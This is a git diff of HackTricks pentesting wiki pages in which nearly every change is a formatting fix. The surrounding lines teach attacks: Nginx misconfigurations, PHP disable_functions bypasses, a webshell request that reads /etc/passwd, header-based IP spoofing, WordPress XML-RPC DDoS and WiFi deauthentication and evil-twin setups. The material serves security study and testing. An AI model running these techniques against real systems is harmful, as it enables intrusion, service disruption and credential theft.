@@ -66,7 +66,7 @@ cmsmap http://moodle.example.com/ ### CVEs -I found that the automatic tools are pretty **useless finding vulnerabilities affecting the moodle version**. You can **check** for them in [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle)**** +I found that the automatic tools are pretty **useless finding vulnerabilities affecting the moodle version**. You can **check** for them in [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle) ## **RCE** diff --git a/pentesting/pentesting-web/nginx.md b/pentesting/pentesting-web/nginx.md index 47d59538..9506b087 100644 --- a/pentesting/pentesting-web/nginx.md +++ b/pentesting/pentesting-web/nginx.md @@ -1,6 +1,6 @@ # Nginx -**Most part of this page was copied from** [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)**** +**Most part of this page was copied from** [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) ## Missing root location 
@@ -15,7 +15,7 @@ server { } ``` -The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. +The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication. 
@@ -79,7 +79,7 @@ With a configuration such as the following: } ``` -The main issue will be that Nginx will send any URL to the PHP interpreter ending in `.php` even if the file doesn’t exist on disc. This is a common mistake in many Nginx configurations, as outlined in the “[Pitfalls and Common Mistakes](https://www.nginx.com/resources/wiki/start/topics/tutorials/config\_pitfalls/#passing-uncontrolled-requests-to-php)” document created by Nginx. +The main issue will be that Nginx will send any URL to the PHP interpreter ending in `.php` even if the file doesn’t exist on disc. This is a common mistake in many Nginx configurations, as outlined in the “[Pitfalls and Common Mistakes](https://www.nginx.com/resources/wiki/start/topics/tutorials/config\_pitfalls/#passing-uncontrolled-requests-to-php)” document created by Nginx. An XSS will occur if the PHP-script tries to define a base URL based on `SCRIPT_NAME`; 
@@ -126,19 +126,19 @@ Learn more about the risks of CRLF injection and response splitting at [https:/ In some cases, user-supplied data can be treated as an Nginx variable. It’s unclear why this may be happening, but it’s not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI. -One way to test for this is to set a referer header value: +One way to test for this is to set a referer header value: ``` $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’ ``` -We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched. +We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched. ## Raw backend response reading -With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response? +With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. 
But what if Nginx does not understand that it’s an HTTP response? -If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this: +If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this: ``` def application(environ, start_response): @@ -147,7 +147,7 @@ def application(environ, start_response): return [b"Secret info, should not be visible!"] ``` -And with the following directives in Nginx: +And with the following directives in Nginx: ``` http { @@ -159,7 +159,7 @@ http { [proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx. -[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. +[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. If we send a normal `GET` request, Nginx will return: 
@@ -193,7 +193,7 @@ Secret info, should not be visible! The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d). -We found 33 Nginx configuration files with `merge_slashes` set to “off”. +We found 33 Nginx configuration files with `merge_slashes` set to “off”. ## Try it yourself diff --git a/pentesting/pentesting-web/php-tricks-esp/README.md b/pentesting/pentesting-web/php-tricks-esp/README.md index 74b587bc..9db9e8c1 100644 --- a/pentesting/pentesting-web/php-tricks-esp/README.md +++ b/pentesting/pentesting-web/php-tricks-esp/README.md 
@@ -133,7 +133,7 @@ $obfs += ""; //int 7 ## More tricks -* **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code. +* **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code. * The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\ This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2). * When you have the **usernames** of the users of the machine. Check the address: **/\~\** to see if the php directories are activated. diff --git a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md index 9e27b833..2d2ba8da 100644 --- a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md +++ b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md 
@@ -494,13 +494,13 @@ Also note the **commented line 324**, you can uncomment it and the **payload wil Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` to get the content of the `/etc/passwd` file. {% hint style="warning" %} -You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting. +You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting. {% endhint %} ## disable\_functions Bypass If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\ -****So, lets see how you can bypass this restriction (if you can) +So, lets see how you can bypass this restriction (if you can) ### Automatic bypass discovery 
@@ -578,7 +578,7 @@ I have created a webshell that makes very easy to perform this actions (note tha There are several ways to bypass disable\_functions if some specific module is being used or exploit some specific PHP version: -* ****[**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)**** +* [**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass) * 5.\* - exploitable with minor changes to the PoC * 7.0 - all versions to date * 7.1 - all versions to date 
@@ -586,21 +586,21 @@ There are several ways to bypass disable\_functions if some specific module is b * 7.3 - all versions to date * 7.4 - all versions to date * 8.0 - all versions to date -* ****[**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)**** -* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)**** +* [**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php) +* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md) * **dl function** -* ****[**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)**** -* ****[**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)**** -* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md)**** -* ****[**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md)**** -* ****[**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md)**** -* ****[**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)**** -* ****[**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)**** -* ****[**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)**** -* ****[**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md)**** -* ****[**Bypass via mem**](disable\_functions-bypass-via-mem.md)**** -* ****[**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)**** -* ****[**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md)**** +* [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only) +* [**Imagick 3.3.0 PHP >= 
5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md) +* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md) +* [**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md) +* [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md) +* [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md) +* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md) +* [**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md) +* [**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md) +* [**Bypass via mem**](disable\_functions-bypass-via-mem.md) +* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md) +* [**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md) ### **ALL IN ONE** diff --git a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md index efae7dc5..4485c6df 100644 --- a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md +++ b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md 
@@ -13,7 +13,7 @@ Normally web pages, files and all of the documents which are transferred from th If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client. -For example, when the CGI script [http://mysitename.com/\*\*cgi-bin/file.pl\*\*](http://mysitename.com/\*\*cgi-bin/file.pl\*\*) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. (explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)) +For example, when the CGI script [http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/**cgi-bin/file.pl**) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. (explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)) ### FastCGI 
@@ -28,7 +28,7 @@ It's possible to run PHP code abusing the FastCGI and avoiding the `disable_func ### Via Gopherus {% hint style="danger" %} -I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**]\(**[https://t.me/peass](https://t.me/peass)**), or twitter \[**@carlospolopm**]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**)**.\*\* +I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via \[**PEASS & HackTricks telegram group here**]\(**[https://t.me/peass](https://t.me/peass)**), or twitter \[**@carlospolopm**]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**)**.** {% endhint %} Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands: 
@@ -47,7 +47,7 @@ Uploading and accessing this script the exploit is going to be sent to FastCGI ( ### PHP exploit {% hint style="danger" %} -I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP (somehow) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**]\(**[https://t.me/peass](https://t.me/peass)**), or twitter \[**@carlospolopm**]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**)**.\*\* +I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP (somehow) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via \[**PEASS & HackTricks telegram group here**]\(**[https://t.me/peass](https://t.me/peass)**), or twitter \[**@carlospolopm**]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**)**.** {% endhint %} ```php @@ -411,7 +411,7 @@ Using the previous function you will see that the function **`system`** is **sti **So, I think that you can only set `disable_functions` via php `.ini` config files and the PHP_VALUE won't override that setting.** -### \*\*\*\*[**FuckFastGCI**](https://github.com/w181496/FuckFastcgi)\*\*\*\* +### [**FuckFastGCI**](https://github.com/w181496/FuckFastcgi) This is a php script to exploit fastcgi protocol to bypass `open_basedir` and `disable_functions`.\ It will help you to bypass strict `disable_functions` to RCE by loading the malicious extension.\ 
diff --git a/pentesting/pentesting-web/put-method-webdav.md b/pentesting/pentesting-web/put-method-webdav.md index 37f0d23f..e6b578a2 100644 --- a/pentesting/pentesting-web/put-method-webdav.md +++ b/pentesting/pentesting-web/put-method-webdav.md @@ -72,7 +72,7 @@ ServerAdmin webmaster@localhost Require valid-user ``` -As you can see there is the files with the valid **credentials** for the **webdav** server: +As you can see there is the files with the valid **credentials** for the **webdav** server: ``` /etc/apache2/users.password diff --git a/pentesting/pentesting-web/special-http-headers.md b/pentesting/pentesting-web/special-http-headers.md index 496e16a2..fa8fe23c 100644 --- a/pentesting/pentesting-web/special-http-headers.md +++ b/pentesting/pentesting-web/special-http-headers.md @@ -8,12 +8,12 @@ Rewrite **IP source**: -* `X-Originating-IP: 127.0.0.1` +* `X-Originating-IP: 127.0.0.1` * `X-Forwarded-For: 127.0.0.1` * `X-Forwarded: 127.0.0.1` * `Forwarded-For: 127.0.0.1` * `X-Forwarded-Host: 127.0.0.1` -* `X-Remote-IP: 127.0.0.1` +* `X-Remote-IP: 127.0.0.1` * `X-Remote-Addr: 127.0.0.1` * `X-ProxyUser-Ip: 127.0.0.1` * `X-Original-URL: 127.0.0.1` 
@@ -56,7 +56,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b * **`X-Cache`** in the response may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached * **`Cache-Control`** indicates if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800` -* **`Vary`** is often used in the response to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. +* **`Vary`** is often used in the response to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. * **`Age`** defines the times in seconds the object has been in the proxy cache. {% content-ref url="../../pentesting-web/cache-deception.md" %} @@ -92,7 +92,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b * **`Content-Location`**: Indicates an alternate location for the returned data. From a pentest point of view this information is usually "useless", but if the resource is **protected** by a 401 or 403 and you can find some **way** to **get** this **info**, this could be **interesting.** \ -****For example a combination of **`Range`** and **`Etag`** in a HEAD request can leak the content of the page via HEAD requests: +For example a combination of **`Range`** and **`Etag`** in a HEAD request can leak the content of the page via HEAD requests: * A request with the header `Range: bytes=20-20` and with a response containing `ETag: W/"1-eoGvPlkaxxP4HqHv6T3PNhV9g3Y"` is leaking that the SHA1 of the byte 20 is `ETag: eoGvPlkaxxP4HqHv6T3PNhV9g3Y` diff --git a/pentesting/pentesting-web/symphony.md b/pentesting/pentesting-web/symphony.md index e6924785..b7326c29 100644 --- a/pentesting/pentesting-web/symphony.md +++ b/pentesting/pentesting-web/symphony.md 
@@ -507,7 +507,7 @@ _Sample output using `Inline::parse` with a serialized payload_ The exploit will therefore run through every possible variable combination, and then try out the two exploitation methods. The code is available on [our GitHub](https://github.com/ambionics/symfony-exploits). -## Accessing symphony /\_profiler information +## Accessing symphony /\_profiler information ![f:id:flattsecurity:20201021204553p:plain](https://cdn-ak.f.st-hatena.com/images/fotolife/f/flattsecurity/20201021/20201021204553.png) @@ -535,6 +535,6 @@ You should also check these URLs: ## References -* [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)**** -* [**https://flattsecurity.hatenablog.com/entry/2020/11/02/124807**](https://flattsecurity.hatenablog.com/entry/2020/11/02/124807)**** -* ****[**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)**** +* [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment) +* [**https://flattsecurity.hatenablog.com/entry/2020/11/02/124807**](https://flattsecurity.hatenablog.com/entry/2020/11/02/124807) +* [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144) diff --git a/pentesting/pentesting-web/uncovering-cloudflare.md b/pentesting/pentesting-web/uncovering-cloudflare.md index 325139ec..53497c4b 100644 --- a/pentesting/pentesting-web/uncovering-cloudflare.md +++ b/pentesting/pentesting-web/uncovering-cloudflare.md 
@@ -2,8 +2,8 @@ Techniques to try to uncover web servers behind cloudflare: -* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) +* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) * Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/) -* ****[**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs. +* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs. * You can also use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before. * If you find a **SSRF inside the web application** you can abuse it to obtain the IP address of the server. diff --git a/pentesting/pentesting-web/web-api-pentesting.md b/pentesting/pentesting-web/web-api-pentesting.md index 216dc570..a9a84262 100644 --- a/pentesting/pentesting-web/web-api-pentesting.md +++ b/pentesting/pentesting-web/web-api-pentesting.md 
@@ -10,11 +10,11 @@ Main: * An example of this documentation can be found in [http://www.dneonline.com/calculator.asmx](http://www.dneonline.com/calculator.asmx) (WSDL document in [http://www.dneonline.com/calculator.asmx?wsdl](http://www.dneonline.com/calculator.asmx?wsdl)) and you can see an example request calling the `Add` method in [http://www.dneonline.com/calculator.asmx?op=Add](http://www.dneonline.com/calculator.asmx?op=Add) * For parsing these files and create example requests you and use the tool **SOAPUI** or the **WSDLer** Burp Suite Extension. - + * **REST APIs (JSON)** * The standard documentation is the WADL file. Find an example here: [https://www.w3.org/Submission/wadl/](https://www.w3.org/Submission/wadl/). However, there are other more developer friendly API representation engines like [https://swagger.io/tools/swagger-ui/](https://swagger.io/tools/swagger-ui/) (check the demo in the page) * For parsing these files and create example requests you an use the tool **Postman** -* ****[**GraphQL**](graphql.md)**** +* [**GraphQL**](graphql.md) ## Tricks @@ -54,13 +54,13 @@ You could **replace** the **`album_id`** parameter with something completely dif ### Parameter pollution - /api/account?**id=\** → /api/account?**id=\\&id=\** +/api/account?**id=\** → /api/account?**id=\\&id=\** ### Wildcard parameter Try to use the following symbols as wildcards: **\***, **%**, **\_**, **.** -* /api/users/\* +* /api/users/\* * /api/users/% * /api/users/\_ * /api/users/. @@ -108,8 +108,8 @@ Old versions may be still be in use and be more vulnerable than latest endpoints * `/api/v1/login` * `/api/v2/login`\ -* `/api/CharityEventFeb2020/user/pp/` -* `/api/CharityEventFeb2021/user/pp/` +* `/api/CharityEventFeb2020/user/pp/` +* `/api/CharityEventFeb2021/user/pp/` ## Owasp API Security Top 10 
@@ -125,7 +125,7 @@ Read this document to learn how to **search** and **exploit** Owasp Top 10 API v ## Tools -* ****[**https://github.com/imperva/automatic-api-attack-tool**](https://github.com/imperva/automatic-api-attack-tool): Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output. +* [**https://github.com/imperva/automatic-api-attack-tool**](https://github.com/imperva/automatic-api-attack-tool): Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output. * [**https://github.com/microsoft/restler-fuzzer**](https://github.com/microsoft/restler-fuzzer): RESTler is the _first stateful REST API fuzzing tool_ for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. For a given cloud service with an OpenAPI/Swagger specification, RESTler analyzes its entire specification, and then generates and executes tests that exercise the service through its REST API. -* ****[**https://github.com/flipkart-incubator/Astra**](https://github.com/flipkart-incubator/Astra): Another tool for api testing -* ****[**https://github.com/assetnote/kiterunner**](https://github.com/assetnote/kiterunner): Great tool to **discover API endpoints** +* [**https://github.com/flipkart-incubator/Astra**](https://github.com/flipkart-incubator/Astra): Another tool for api testing +* [**https://github.com/assetnote/kiterunner**](https://github.com/assetnote/kiterunner): Great tool to **discover API endpoints** diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md index a7ce30c4..64b5545b 100644 --- a/pentesting/pentesting-web/wordpress.md +++ b/pentesting/pentesting-web/wordpress.md 
@@ -3,7 +3,7 @@ ## Basic Information **Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\ -\_\_**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in\*\*:\*\* [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\ +\_\_**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in**:** [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\ **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) In **wp-config.php** you can find the root password of the database. @@ -103,7 +103,7 @@ curl http://blog.example.com/wp-json/wp/v2/users **Only information about the users that has this feature enable will be provided**. -Also note that _**/wp-json/wp/v2/pages** could leak IP addresses\*\*.\*\*_ +Also note that _**/wp-json/wp/v2/pages** could leak IP addresses**.**_ ### XML-RPC @@ -165,7 +165,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one * If you get **faultCode** with a value **greater** then **0** (17), it means the port is open. -Take a look to the use of \*\*`system.multicall`\*\*in the previous section to learn how to abuse this method to cause DDoS. +Take a look to the use of **`system.multicall`**in the previous section to learn how to abuse this method to cause DDoS. ### wp-cron.php DoS 
@@ -386,4 +386,4 @@ Also, **only install trustable WordPress plugins and themes**. * **Limit login attempts** to prevent Brute Force attacks * Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses. -## \*\*\*\* +## diff --git a/pentesting/pentesting-wifi/README.md b/pentesting/pentesting-wifi/README.md index 0f6d9e66..9f4e26bc 100644 --- a/pentesting/pentesting-wifi/README.md +++ b/pentesting/pentesting-wifi/README.md @@ -74,7 +74,7 @@ This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically: ## Attacks Summary -* **DoS** +* **DoS** * Deauthentication/disassociation -- Disconnect everyone (or a specific ESSID/Client) * Random fake APs -- Hide nets, possible crash scanners * Overload AP -- Try to kill the AP (usually not very useful) @@ -190,7 +190,7 @@ mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l] **ATTACK MODE s: Attacks for IEEE 802.11s mesh networks** -Various attacks on link management and routing in mesh networks. Flood neighbors and routes, create black holes and divert traffic! +Various attacks on link management and routing in mesh networks. Flood neighbors and routes, create black holes and divert traffic! **ATTACK MODE w: WIDS Confusion** @@ -616,7 +616,7 @@ hostapd-wpe ./victim/victim.conf -s In the configuration file you can select a lot of different things like ssid, channel, user files, cret/key, dh parameters, wpa version and auth... -[**Using hostapd-wpe with EAP-TLS to allow any certificate to login.**](evil-twin-eap-tls.md)**** +[**Using hostapd-wpe with EAP-TLS to allow any certificate to login.**](evil-twin-eap-tls.md) #### Using EAPHammer diff --git a/pentesting/pentesting-wifi/evil-twin-eap-tls.md b/pentesting/pentesting-wifi/evil-twin-eap-tls.md index 66de9d5e..404b7c28 100644 --- a/pentesting/pentesting-wifi/evil-twin-eap-tls.md +++ b/pentesting/pentesting-wifi/evil-twin-eap-tls.md 
@@ -6,7 +6,7 @@ You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](h ## Evil Twin for EAP-TLS -**This post was copied from** [**https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/**](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)**** +**This post was copied from** [**https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/**](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/) ### The Uncommon Case: Attacking EAP-TLS diff --git a/phishing-methodology/README.md b/phishing-methodology/README.md index 93b8adec..c80347ff 100644 --- a/phishing-methodology/README.md +++ b/phishing-methodology/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) 